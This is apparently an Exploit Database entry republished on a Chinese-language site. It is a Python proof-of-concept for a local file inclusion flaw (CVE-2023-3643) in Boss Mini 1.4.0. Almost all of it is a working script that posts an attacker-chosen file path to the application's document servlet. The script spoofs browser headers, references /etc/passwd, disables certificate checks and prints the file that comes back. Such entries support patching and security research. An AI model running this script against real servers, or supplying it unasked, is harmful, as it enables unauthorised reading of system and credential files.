Boss Mini 1.4.0 – local file inclusion

• Exploit Database
• 40 阅读

• 作者： nltt0
  日期： 2024-03-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51848/

• # Exploit Title: Boss Mini 1.4.0 - local file inclusion
  # Date: 07/12/2023
  # Exploit Author: [nltt0] (https://github.com/nltt-br))
  # CVE: CVE-2023-3643
  
  
  '''
   _____ ______ 
  /__ \ | |/___|
  | /\/ __ _| | __ _ _ __ __ _______ \ `--. 
  | |/ _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
  | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
   \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ 
  __/ | 
   |___/
  
  '''
  
  from requests import post 
  from urllib.parse import quote
  from argparse import ArgumentParser
  
  try:
  parser = ArgumentParser(description='Local file inclusion [Boss Mini]')
  parser.add_argument('--domain', required=True, help='Application domain')
  parser.add_argument('--file', required=True, help='Local file')
  
  args = parser.parse_args()
  host = args.domain
  file = args.file
  url = '{}/boss/servlet/document'.format(host)
  file2 = quote(file, safe='')
  
  headers = {
  'Host': host,
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',
  'Content-Type': 'application/x-www-form-urlencoded',
  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',
  'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)
  }
  
  
  data = {
  'path': file2
  }
  
  try:
  req = post(url, headers=headers, data=data, verify=False)
  if req.status_code == 200:
  print(req.text)
  
  except Exception as e:
  print('Error in {}'.format(e)) 
   
  
  except Exception as e:
  print('Error in {}'.format(e))